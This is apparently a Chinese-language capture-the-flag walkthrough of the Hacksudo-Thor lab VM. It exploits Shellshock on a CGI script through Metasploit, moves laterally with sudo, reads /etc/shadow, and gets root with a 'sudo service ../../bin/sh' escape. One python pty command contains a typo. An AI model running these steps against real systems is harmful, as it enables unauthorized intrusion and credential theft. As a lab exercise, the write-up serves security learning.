环境
靶机官方下载地址
靶机VirtulaBox: Hacksudo-Thor 192.168.138.9
攻击机VMware : kail 192.168.138.3
VirtulaBox 和 VMware 实现互通
1.将VirtulaBox 的网络设置成 VirtualBox Host-Only
2.将VMware也设置成VirtualBox Host-Only
主机发现信息收集
arp-scan -l -I eth0
nmap -A -p- -T5 192.168.138.9 -oN /tmp/nmapScan/hacksudo-thor.txt
我们发现开启了web服务,可以访问http://192.168.138.9:80查看一下网站
web应用程序评估
- 开发语言?
这个网站通过浏览器的url可以发现是一个php语言开发的
- 服务器软件?
通过nmap扫描和浏览器插件,我们可以发现服务器软件是Apache Http Server
- 用途?
发现是一个银行网站
- 应用系统类型?
通过nmap扫描得出是个linux系统
- 数据库类型?
暂时没有发现
推荐软件 :Wappalyzer 可以帮你检测当前网站的信息
目录爆破
dirb 命令参数
格式:dirb <url_base> [<wordlist_file(s)>] [options]
dirb <网站连接> [字典(可以选)] [操作]
-a 设置user-agent
-p <proxy[:port]>设置代理
-c 设置cookie
-z 添加毫秒延迟,避免洪水攻击
-o 输出结果
-X 在每个字典的后面添加一个后缀
-H 添加请求头
-i 不区分大小写搜索
这里我们发现有个cgi-bin
的目录,我可以可以尝试对这个文件夹进行扫描看看有没有漏洞
dirb http://192.168.138.9/cgi-bin -X .sh
扫到shell.sh,看看是否有破壳漏洞
``
扫到shell.sh,看看是否有破壳漏洞
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh 192.168.138.9
–script http-shellshock: http-shellshock 是一个用于检测 Shellshock漏洞的脚本。Shellshock 是一个在 Bash shell 中发现的安全漏洞,允许远程攻击者执行任意代码
这里nmap扫描出了漏洞直接搜索漏洞
searchsploit shellshock
通过漏洞搜索工具搜索shellshock漏洞
我们发现apache mod_cgi 是存在漏洞的
通过msf利用漏洞
search shellshock
use 2
show options
set rhosts 192.168.138.9
set targeturi /cgi-bin/shell.sh
run
拿到一个meterpreter,我们发现我们拿到了web服务的权限我们要想办法拿到root的权限
shell
id
提权
sudo -l
查看当前用户的授权情况
这里我们发现有一个thor用户执行的脚本文件的权限
sudo -u thor /home/thor/./hammer.sh
sudo -u 指定已什么用户执行当前命令,sudo默认是root权限
这里我们发现可以通过thor权限执行命令,这样我们就可以横向拓展得到thor的权限
/bin/bash
获取thor的shell
python -c "impotr pty;pty.spawn('/bin/bash')"
我们发现得到了thor的用户权限
sudo -l
这里我们进行查案thor的用户sudo权限,我们发现有root的权限
sudo -u root cat /etc/shadow
这里我们可以通过查看shaow密码文件,对root密码进行解密
我们还发现有个service的文件我们可以去https://gtfobins.github.io 网站查找有没有service的相关的提权漏洞,我们发先service存在sudo的提权漏洞
sudo service ../../bin/sh
这我们就拿到root权限了!!!!!!